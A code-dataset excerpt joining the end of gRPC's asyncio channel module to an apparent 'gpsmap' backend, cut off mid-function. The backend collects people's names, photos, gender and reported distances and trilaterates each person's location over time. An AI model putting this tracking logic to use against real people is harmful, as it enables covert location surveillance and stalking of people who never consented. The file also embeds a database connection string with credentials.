A Call object instance which is an awaitable object.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
if not self._interceptors:
call = UnaryUnaryCall(request, _timeout_to_deadline(timeout),
metadata, credentials, wait_for_ready,
self._channel, self._method,
self._request_serializer,
self._response_deserializer, self._loop)
else:
call = InterceptedUnaryUnaryCall(
self._interceptors, request, timeout, metadata, credentials,
wait_for_ready, self._channel, self._method,
self._request_serializer, self._response_deserializer,
self._loop)
self._ongoing_calls.trace_call(call)
return call
class UnaryStreamMultiCallable(_BaseMultiCallable):
"""Affords invoking a unary-stream RPC from client-side in an asynchronous way."""
def __call__(self,
request: Any,
*,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.UnaryStreamCall:
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
A Call object instance which is an awaitable object.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
deadline = _timeout_to_deadline(timeout)
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
call = UnaryStreamCall(request, deadline, metadata, credentials,
wait_for_ready, self._channel, self._method,
self._request_serializer,
self._response_deserializer, self._loop)
self._ongoing_calls.trace_call(call)
return call
class StreamUnaryMultiCallable(_BaseMultiCallable):
"""Affords invoking a stream-unary RPC from client-side in an asynchronous way."""
def __call__(self,
request_async_iterator: Optional[AsyncIterable[Any]] = None,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.StreamUnaryCall:
"""Asynchronously invokes the underlying RPC.
Args:
request_async_iterator: An optional async iterable of request messages for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
A Call object instance which is an awaitable object.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
deadline = _timeout_to_deadline(timeout)
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
call = StreamUnaryCall(request_async_iterator, deadline, metadata,
credentials, wait_for_ready, self._channel,
self._method, self._request_serializer,
self._response_deserializer, self._loop)
self._ongoing_calls.trace_call(call)
return call
class StreamStreamMultiCallable(_BaseMultiCallable):
"""Affords invoking a stream-stream RPC from client-side in an asynchronous way."""
def __call__(self,
request_async_iterator: Optional[AsyncIterable[Any]] = None,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.StreamStreamCall:
"""Asynchronously invokes the underlying RPC.
Args:
request_async_iterator: An optional async iterable of request messages for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
A Call object instance which is an awaitable object.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
deadline = _timeout_to_deadline(timeout)
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
call = StreamStreamCall(request_async_iterator, deadline, metadata,
credentials, wait_for_ready, self._channel,
self._method, self._request_serializer,
self._response_deserializer, self._loop)
self._ongoing_calls.trace_call(call)
return call
class Channel:
"""Asynchronous Channel implementation.
A cygrpc.AioChannel-backed implementation.
"""
_loop: asyncio.AbstractEventLoop
_channel: cygrpc.AioChannel
_unary_unary_interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]]
_ongoing_calls: _OngoingCalls
def __init__(self, target: Text, options: Optional[ChannelArgumentType],
credentials: Optional[grpc.ChannelCredentials],
compression: Optional[grpc.Compression],
interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]]):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
interceptors: An optional list of interceptors that would be used for
intercepting any RPC executed with that channel.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
if interceptors is None:
self._unary_unary_interceptors = None
else:
self._unary_unary_interceptors = list(
filter(
lambda interceptor: isinstance(interceptor,
UnaryUnaryClientInterceptor),
interceptors))
invalid_interceptors = set(interceptors) - set(
self._unary_unary_interceptors)
if invalid_interceptors:
raise ValueError(
"Interceptor must be "+\
"UnaryUnaryClientInterceptors, the following are invalid: {}"\
.format(invalid_interceptors))
self._loop = asyncio.get_event_loop()
self._channel = cygrpc.AioChannel(_common.encode(target), options,
credentials, self._loop)
self._ongoing_calls = _OngoingCalls()
async def __aenter__(self):
"""Starts an asynchronous context manager.
Returns:
Channel the channel that was instantiated.
"""
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
"""Finishes the asynchronous context manager by closing the channel.
Still active RPCs will be cancelled.
"""
await self._close(None)
async def _close(self, grace):
if self._channel.closed():
return
# No new calls will be accepted by the Cython channel.
self._channel.closing()
if grace:
# pylint: disable=unused-variable
_, pending = await asyncio.wait(self._ongoing_calls.calls,
timeout=grace,
loop=self._loop)
if not pending:
return
# A new set is created acting as a shallow copy because
# when cancellation happens the calls are automatically
# removed from the originally set.
calls = WeakSet(data=self._ongoing_calls.calls)
for call in calls:
call.cancel()
self._channel.close()
async def close(self, grace: Optional[float] = None):
"""Closes this Channel and releases all resources held by it.
This method immediately stops the channel from executing new RPCs in
all cases.
If a grace period is specified, this method waits until all active
RPCs are finished; once the grace period is reached, the ones that have
not terminated are cancelled. If a grace period is not specified
(by passing None for grace), all existing RPCs are cancelled immediately.
This method is idempotent.
"""
await self._close(grace)
def get_state(self,
try_to_connect: bool = False) -> grpc.ChannelConnectivity:
"""Check the connectivity state of a channel.
This is an EXPERIMENTAL API.
If the channel reaches a stable connectivity state, it is guaranteed
that the return value of this function will eventually converge to that
state.
Args:
try_to_connect: a bool indicating whether the Channel should try to
connect to the peer or not.
Returns:
A ChannelConnectivity object.
"""
result = self._channel.check_connectivity_state(try_to_connect)
return _common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[result]
async def wait_for_state_change(
self,
last_observed_state: grpc.ChannelConnectivity,
) -> None:
"""Wait for a change in connectivity state.
This is an EXPERIMENTAL API.
The function blocks until there is a change in the channel connectivity
state from the "last_observed_state". If the state is already
different, this function will return immediately.
There is an inherent race between the invocation of
"Channel.wait_for_state_change" and "Channel.get_state". The state can
change arbitrary times during the race, so there is no way to observe
every state transition.
If there is a need to put a timeout for this function, please refer to
"asyncio.wait_for".
Args:
last_observed_state: A grpc.ChannelConnectivity object representing
the last known state.
"""
assert await self._channel.watch_connectivity_state(
last_observed_state.value[0], None)
def unary_unary(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> UnaryUnaryMultiCallable:
"""Creates a UnaryUnaryMultiCallable for a unary-unary method.
Args:
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the
response message. Response goes undeserialized in case None
is passed.
Returns:
A UnaryUnaryMultiCallable value for the named unary-unary method.
"""
return UnaryUnaryMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer,
self._unary_unary_interceptors,
self._loop)
def unary_stream(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> UnaryStreamMultiCallable:
return UnaryStreamMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer, None, self._loop)
def stream_unary(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> StreamUnaryMultiCallable:
return StreamUnaryMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer, None, self._loop)
def stream_stream(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> StreamStreamMultiCallable:
return StreamStreamMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer, None,
self._loop)
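# Hedged usage sketch (not part of the original module). Assuming the package
# exposes an `insecure_channel(target)` helper that returns a Channel:
#     async with insecure_channel('localhost:50051') as channel:
#         say_hello = channel.unary_unary('/helloworld.Greeter/SayHello')
#         reply = await say_hello(request_message)
# Each multi-callable returns an awaitable Call object; leaving the
# `async with` block (or calling close()) cancels any RPCs still in flight
# unless a grace period is given.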
``` |
{
"source": "johnzhd/gpsmap",
"score": 2
} |
#### File: gpsmap/gpsmap/backend.py
```python
import pymongo
import datetime
import json
import Queue
import threading
import time
import calc_postion
from pprint import pprint
import md5
from baselib import error_print
global_db_name = "gpsmap"
global_db_url = "mongodb://gpsmap:[email protected]:27017/"+global_db_name
global_db_origin_collection = "origin"
global_db_calc_collection = "calc"
global_db_user_collection = "userextern"
global_db_device_collection = "device"
global_key_la = "latitude"
global_key_lo = "longitude"
global_key_list = "items"
global_key_sendtime = "sendtime"
global_key_uid = "id"
global_key_dis = "distance"
global_key_name = "name"
global_key_img = "img"
global_key_gender = "gender"
global_key_device = "device"
global_default_base_time = datetime.datetime(1970,1,1,0,0,0,0)
global_default_uint_time = 60 * 10
global_care_keys = [global_key_la, global_key_lo, global_key_list, global_key_sendtime]
global_origin_keys = [global_key_uid, global_key_la, global_key_lo, global_key_sendtime, global_key_dis]
'''
origin:
_id: obj()
loc:
type: "Point"
coordinates: []
distance: "300"
sendtime: "2016-01-01 01:01:01"
time: "2016-01-01 01:01:01"
id : "string"
calc:
_id: obj()
id: "string"
time: "2016-01-01 01:01:01"
loc:
type: "Point"
coordinates: []
distance: "300"
level: 0 unused
1 High
...
5 Low
'''
def md5String(s):
try:
s = s.encode(encoding="utf-8")
return md5.new(s).hexdigest()
except Exception as e:
error_print(e)
return None
def CreateUID(obj):
'''
change to use name md5
'''
## global_key_uid
## global_key_img
md5key_list = [global_key_name]
try:
m = md5.new()
ret = ""
for key in md5key_list:
if key not in obj:
return obj[global_key_uid]
value = obj[key].encode(encoding="utf-8")
m.update(value)
ret += "{0:04d}".format(len(value))
ret_m = m.hexdigest()
if not ret_m:
return obj[global_key_uid]
return ret + ret_m
except Exception as e:
error_print(e)
return None
"""
origin :
{
"id", "time", "sendtime", "distance",
"loc": { type: "Point", coordinates: [ 40, 5 ] }
}
{
"id" : 1
"time" : -1
"loc" : "2dsphere"
}
userextern
{
"id": 1
"time": -1
}
calc
{
"id": 1
"loc": "2dsphere"
"distance":
"time": -1
}
device
{
"device": 1
"loc" : "2dsphere"
"time": -1
}
"""
global_timedelta = datetime.timedelta(minutes=5)
global_calc_timedelta = datetime.timedelta(minutes=1)
global_EP = 50
global_timeformat_string = "%Y-%m-%d %H:%M:%S"
global_timeformat_string_minutes = "%Y-%m-%d %H:%M"
def time_format(date):
return date.strftime(global_timeformat_string)
def string_to_time(s):
try:
return datetime.datetime.strptime(s, global_timeformat_string)
except Exception as e:
return None
def string_standard(s):
try:
return time_format(string_to_time(s))
except Exception as e:
return None
def time_now():
return time_format( datetime.datetime.now() )
def string_time_to_unit(start, check, tunit):
try:
c = string_to_time(check)
d = c - start
ret = d.total_seconds() / tunit
return int(ret)
except Exception as e:
return None
def string_min_whole(s, start, tunit):
de = datetime.timedelta(seconds = s * tunit)
return time_format(start + de)
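# Note (added): illustrative round trip of the time-bucketing helpers with
# tunit = 600 seconds (the default 10-minute unit):
#     start = global_default_base_time
#     n = string_time_to_unit(start, "2016-01-01 01:25:00", 600)
#     string_min_whole(n + 1, start, 600)   # -> "2016-01-01 01:30:00"
# i.e. each sample is assigned to the end of its 10-minute window, which is
# how check_and_calc_with_data keys its buckets.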
def fretch_gps_from_data(data):
try:
return data["loc"]["coordinates"][1], data["loc"]["coordinates"][0], int(data["distance"])
except Exception as e:
return None, None, None
class opt():
def __init__(self):
self.connect = pymongo.MongoClient(global_db_url)
self.queue = Queue.Queue()
self.mutex = threading.Lock()
self.thread = None
def Start_Calc_Thread(self):
if self.mutex.acquire():
if not self.thread or not self.thread.is_alive():
self.thread = None
self.thread = threading.Thread(target=self.ThreadCore)
self.thread.start()
self.mutex.release()
def ThreadCore(self):
print("In Core.")
while not self.queue.empty():
try:
ids = self.queue.get(False)
print("Check ids {0}.".format(len(ids)))
n = self.calc_list_id(ids)
print("Update ids {0}.".format(n))
n = self.UpdateUser(ids)
print("Update users {0}.".format(n))
except Exception as e:
break
print("Quit Core.")
def producer(self, data):
# self.queue.put(data)
# return true
obj = self.produce_obj(data)
if not obj:
return None
if global_key_la not in obj or global_key_lo not in obj or global_key_list not in obj:
return None
return self.producer_action(obj)
def producer_action(self, obj):
try:
count = self.produce_bulk(obj, global_db_origin_collection, global_db_user_collection )
return count
except Exception as e:
error_print(e)
print(obj)
pass
return None
def produce_obj(self, data):
try:
obj = json.loads(data)
return obj
except Exception as e:
error_print(e)
return None
def produce_bulk(self, obj, opoints, users):
if not obj:
return None
db = self.connect.get_database(global_db_name)
o_coll = db.get_collection(opoints)
u_coll = db.get_collection(users)
o_bulk = o_coll.initialize_unordered_bulk_op()
u_bulk = u_coll.initialize_unordered_bulk_op()
ids = set()
for origin in self.parser_obj(obj):
data = self.produce_insert_origin(origin)
if not data:
continue
o_bulk.insert( data )
ids.add(data[global_key_uid])
f, d = self.produce_update_user(origin)
if not f or not d:
continue
u_bulk.find(f).upsert().update(d)
self.start_calc_ids(list(ids))
result = o_bulk.execute()
count = result['nInserted']
result = u_bulk.execute()
# count = result['nUpserted'] + result['nModified']
return count > 0
def produce_insert_origin(self, origin):
try:
for n in global_origin_keys:
if n not in origin:
return None
data = {}
data[global_key_uid] = str(origin[global_key_uid])
data[global_key_dis] = str(origin[global_key_dis])
data[global_key_sendtime] = str(origin[global_key_sendtime])
data["loc"] = { "type": "Point", "coordinates": [ float(origin[global_key_lo]), float(origin[global_key_la]) ] }
data["time"] = time_now()
return data
except Exception as e:
pass
return None
def produce_update_user(self, origin):
try:
data = origin.copy()
for key in global_origin_keys[1:]:
if key in data:
del data[key]
data["time"] = time_now()
f = {global_key_uid: data[global_key_uid]}
d = {}
if "device" in data:
d["$addToSet"] = {"device": data["device"]}
del data["device"]
d["$set"] = data
d["$inc"] = {"ocount": 1}
return f, d
except Exception as e:
pass
return None, None
def standardize_data(self, origin):
if "sex" in origin:
value = int(origin["sex"])
del origin["sex"]
try:
if value == 1:
origin[global_key_gender] = "male"
elif value == 2:
origin[global_key_gender] = "female"
else:
origin[global_key_gender] = "none"
except Exception as e:
origin[global_key_gender] = "none"
return origin
def parser_obj(self, obj):
for key in global_care_keys:
if key not in obj:
return
if not obj[global_key_list]:
return
unique = {}
unique[global_key_sendtime] = obj[global_key_sendtime]
unique[global_key_la] = obj[global_key_la]
unique[global_key_lo] = obj[global_key_lo]
if global_key_device in obj:
unique[global_key_device] = obj[global_key_device]
for one in obj[global_key_list]:
if global_key_dis not in one:
continue
uid = CreateUID(one)
if not uid:
continue
ret = unique.copy()
ret.update(one)
ret[global_key_uid] = uid
yield self.standardize_data(ret)
def get_origin_points_data_from_db(self, i, start, end):
f = {"id": i}
c = {"_id": 0, "loc.coordinates":1, "time":1, "distance":1}
ret = []
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_calc_collection)
if start:
f["time"] = {}
f["time"]["$gte"] = start
if end:
if "time" not in f:
f["time"] = {}
f["time"]["$lte"] = end
origin_collection = db.get_collection(global_db_origin_collection)
r = origin_collection.find(f, c).sort("time", pymongo.ASCENDING)
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return ret
def cut_list_by_time(self, data, tunit):
origin_list = {}
base_time = global_default_base_time
data = sorted(data, key=lambda x: x["time"])
for d in data:
if not d:
continue
try:
minutes = string_time_to_unit(base_time, d["time"], tunit)
if minutes is None:
continue
if minutes not in origin_list:
origin_list[minutes] = []
origin_list[minutes].append(d)
except Exception as e:
continue
return origin_list, base_time
def check_and_calc_with_data(self, data, tunit, id):
try:
tunit = int(tunit)
except Exception as e:
tunit = global_default_uint_time
dic_data, base_time = self.cut_list_by_time(data, tunit)
if not dic_data:
return None
new_ret = {}
for minutes in dic_data:
key = string_min_whole(minutes + 1, base_time, tunit)
r = self.zone_and_calc(dic_data[minutes], id, key)
new_ret[key] = r
return new_ret
def translate_calc_to_ui(self, new_ret, i):
ret = []
for key in new_ret:
if not new_ret[key]:
continue
d = new_ret[key]
ret.append({global_key_uid: i,
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
"distance": d["distance"]
})
return ret
def check_and_calc(self, i, start, end, tunit):
data = self.get_origin_points_data_from_db(i, start, end)
if not data:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
if not ret:
return None
return self.translate_calc_to_ui(ret, i)
def zone_and_calc(self, l, i, tm):
if len(l) < 3:
return None
r = calc_postion.calc_list(l, global_EP, fretch_gps_from_data)
if r:
ret = {}
ret[global_key_uid] = i
ret["loc"] = {"type": "Point", "coordinates" : [r[1], r[0]]}
ret["distance"] = r[2]
ret["time"] = tm
ret["level"] = r[3]
return ret
return None
def start_calc_ids(self, ids):
# push in Queue
# in no threading
# start threading
if not ids:
return
self.queue.put(ids)
self.Start_Calc_Thread()
def calc_list_id(self, ids):
tunit = global_default_uint_time
db = self.connect.get_database(global_db_name)
u_coll = db.get_collection(global_db_calc_collection)
u_bulk = u_coll.initialize_unordered_bulk_op()
count = 0
for i in ids:
if not i:
continue
ret = self.calc_one_id(i, u_coll, u_bulk, tunit)
if ret:
count += ret
if count > 0:
try:
result = u_bulk.execute()
count = result['nUpserted'] + result['nModified']
return count
except Exception as e:
error_print(e)
return None
def calc_one_id(self, i, u_coll, u_bulk, tunit):
last_time = None
try:
it = u_coll.find({global_key_uid: i}, {"_id":0, "time": 1}).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
last_time = one["time"]
except Exception as e:
return None
data = self.get_origin_points_data_from_db(i, last_time, None)
if not data or len(data) < 3:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
try:
max = len(ret)
count = 0
for key in ret:
count += 1
d = ret[key]
f = {global_key_uid: i, "level": 0, "time": key}
if not d:
if count >= max: ## In the last time zone, We won't insert None to db
count -= 1
break
d = f
u_bulk.find(f).upsert().update_one({"$set": d})
d = None
f = None
return count
except Exception as e:
error_print(e)
return None
def UpdateUser(self, ids):
db = self.connect.get_database(global_db_name)
uniset = {}
try:
t_coll = db.get_collection(global_db_origin_collection)
for i in ids:
if i not in uniset:
uniset[i] = {}
else:
continue
f = {"id": i}
n = t_coll.find(f).count()
uniset[i]["ocount"] = n
t_coll = db.get_collection(global_db_calc_collection)
for key in uniset:
f = {"id": key}
n = t_coll.find(f).count()
uniset[key]["pcount"] = n
t_coll = db.get_collection(global_db_user_collection)
u_bulk = t_coll.initialize_unordered_bulk_op()
for key in uniset:
u_bulk.find({"id": key}).update({"$set": uniset[key]})
result = u_bulk.execute()
count = result['nModified']
return count
except Exception as e:
error_print(e)
return None
def NearPoint(self, lat, lng, count):
if not count:
count = 20
point = {"type": "Point", "coordinates": [lng, lat]}
f = {"loc": {"$near": {"$geometry": point}}}
c = {"_id": 0, "loc":1, "id": 1, "time": 1, "level": 1, "distance": 1}
db = self.connect.get_database(global_db_name)
coll = db.get_collection(global_db_calc_collection)
it = coll.find(f, c) ## sort by $near
ret = {}
for one in it:
if len(ret) >= count:
break
try:
if one['id'] not in ret:
ret[one['id']] = one
continue
if one['level'] > 0 and one['level'] < ret[one['id']]['level']:
ret[one['id']] = one
continue
if one['time'] > ret[one['id']]['time']:
ret[one['id']] = one
continue
except Exception as e:
continue
if not ret:
return None
c = {"_id": 0, "name": 1, "time": 1, "id": 1, "ocount": 1, "pcount": 1,
"img":1, "sign": 1, global_key_gender: 1}
coll = db.get_collection(global_db_user_collection)
for key in ret:
tmp = ret[key]
ret[key] = {global_key_uid: key,
"time": tmp["time"],
"latitude": tmp["loc"]["coordinates"][1],
"longitude": tmp["loc"]["coordinates"][0],
"distance": tmp["distance"]
}
f = {"id": key}
try:
it = coll.find(f, c).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
ret[key].update(one)
except Exception as e:
pass
if ret:
tmp = []
for key in ret:
tmp.append(ret[key])
ret = tmp
return ret
## update by user
'''
UI action
'''
def create_filter_for_user(self, obj):
regex_list = ["name", "sign", "province", "city"]
bool_list = {"country": "CN"}
select_list = {"gender": ("female", "male")}
match_list = ["id", "device"]
gte_list = ["ocount", "pcount"]
time_list = ["start", "end"]
for key in ["ocount", "pcount"]:
if key in obj and obj[key] is not None:
obj[key] = int(obj[key])
f = {}
for key in obj:
if not obj[key]:
continue
if key in regex_list:
f[key] = {'$regex': obj[key], '$options': "i"}
continue
if key in bool_list:
if obj[key] == bool_list[key]:
f[key] = obj[key]
else:
f[key] = {"$not": {"$eq": bool_list[key]}}
continue
if key in select_list:
try:
s = str(obj[key]).lower()
if s in select_list[key]:
f[key] = s
except Exception as e:
pass
continue
if key in match_list:
f[key] = obj[key]
continue
if key in gte_list:
f[key] = {"$gte": obj[key]}
continue
if key in time_list:
obj[key] = string_standard(obj[key])
if "time" not in f:
f["time"] = {}
if key == "start":
f["time"]["$gte"] = obj[key]
elif key == "end":
f["time"]["$lte"] = obj[key]
continue
return f
def create_row_for_user(self):
return {"_id": 0,
"name": 1, "time": 1, "id": 1,
"device": 1, "ocount": 1, "pcount": 1,
"country":1, "province":1, "city":1,
"img":1, "sign": 1, global_key_gender: 1}
def show_search(self, obj):
f = self.create_filter_for_user(obj)
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def show_name(self, name):
f = self.create_filter_for_user({"name": name})
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def origin_points(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
ret.append(tmp)
return ret
except Exception as e:
error_print(e)
return None
def origin_points_uni(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
uniset = {}
min_time = None
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
if not min_time or min_time["time"] > tmp["time"]:
min_time = tmp;
if (tmp["latitude"], tmp["longitude"]) not in uniset or uniset[(tmp["latitude"], tmp["longitude"])]["time"] < tmp["time"]:
uniset[(tmp["latitude"], tmp["longitude"])] = tmp;
ret = []
if min_time:
if (min_time["latitude"], min_time["longitude"]) in uniset and uniset[(min_time["latitude"], min_time["longitude"])]["time"] == min_time["time"]:
del uniset[(min_time["latitude"], min_time["longitude"])]
ret.append(min_time)
for one in uniset.itervalues():
ret.append(one)
return ret
except Exception as e:
error_print(e)
return None
'''
Device Action
'''
def set_device(self, task, device, la, lo):
f = {"device": device, "task": task}
data ={"$set": {"device": device,
"loc": {"type": "Point", "coordinates" : [lo, la]},
"time": time_now()} }
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.update_one(f, data, True)
return r.modified_count or r.upserted_id
except Exception as e:
error_print(e)
return None
def device_obj(self, task, data):
try:
obj = json.loads(data)
tmp = []
task_len = len(task)
max_name = ''
name = "!"
for one in obj:
if "latitude" not in one or "longitude" not in one:
continue
name = "!"
if "device" in one and one["device"][0:task_len] == task:
name = str(one["device"])
if max_name < name:
max_name = name
tmp.append((name, one["latitude"], one["longitude"]))
tmp = sorted(tmp, key=lambda x: x[0])
number = 0
if max_name:
try:
number = int(max_name[task_len:])
except Exception as e:
error_print(e)
pass
if number < 1:
number = 1
else:
number += 1
ret = {}
for one in tmp:
name = one[0]
if name in ret or name == "!":
name = "{0}{1:04d}".format(task, number)
number += 1
ret[name] = (one[1], one[2])
return ret
except Exception as e:
error_print(e)
pass
return None
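    # Illustrative sketch (hypothetical payload, not from the original code):
    # for task 'node' and
    #   data = '[{"device": "node0001", "latitude": 31.2, "longitude": 121.4},
    #            {"latitude": 31.3, "longitude": 121.5}]'
    # device_obj returns {"node0001": (31.2, 121.4), "node0002": (31.3, 121.5)},
    # auto-numbering any entry that arrives without a device id.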
def setall_device(self, task, data):
# find all task point
# loop data
# bulk insert update delete
#
#
obj = self.device_obj(task, data)
if not obj:
if data is None:
return None
### remove all
return self.delete_all_device(task)
f = {"task": task}
c = {"_id": 1, "device": 1, "loc": 1, "time": 1}
action = []
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
bulk = collection.initialize_unordered_bulk_op()
it = collection.find(f, c).sort("time", pymongo.DESCENDING)
count = 0
for one in it:
if "device" not in one or one["device"] not in obj:
bulk.find({"_id": one["_id"]}).remove()
count += 1
continue
tmp = obj[one["device"]]
data = {
"$set": {
"device": one["device"],
"loc":{"type": "Point", "coordinates": [tmp[1], tmp[0]]},
"time": time_now(),
"task": task
}
}
bulk.find({"_id": one["_id"]}).upsert().update(data)
count += 1
del obj[one["device"]]
for key in obj:
data = {
"device": key,
"loc": {"type": "Point", "coordinates": [obj[key][1], obj[key][0]]},
"time": time_now(),
"task": task
}
bulk.insert(data)
count += 1
result = bulk.execute()
count = result['nInserted'] + result['nUpserted'] + result['nModified'] + result['nRemoved']
if count:
return self.get_device_all(task)
return None
def get_device(self, task, device):
f = {"device": device, "task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append({ "device": d["device"],
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
})
return ret
except Exception as e:
error_print(e)
return None
def delete_device(self, task, device):
f = {"device": device, "task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_one(f).deleted_count > 0
except Exception as e:
error_print(e)
return None
def delete_all_device(self, task):
f = {"task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_many(f).deleted_count
except Exception as e:
error_print(e)
return None
def get_device_all(self, task):
f = {"task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort([("device", pymongo.ASCENDING), ("time", pymongo.DESCENDING)])
t = {}
for d in r:
if d['device'] not in t:
t[d['device']] = {}
elif t[d['device']]['time'] > d["time"]:
continue
t[d['device']]['time'] = d["time"]
t[d['device']]['latitude'] = d["loc"]["coordinates"][1]
t[d['device']]['longitude'] = d["loc"]["coordinates"][0]
ret = []
for d in t:
ret.append( {
'device': d,
'time': t[d]['time'],
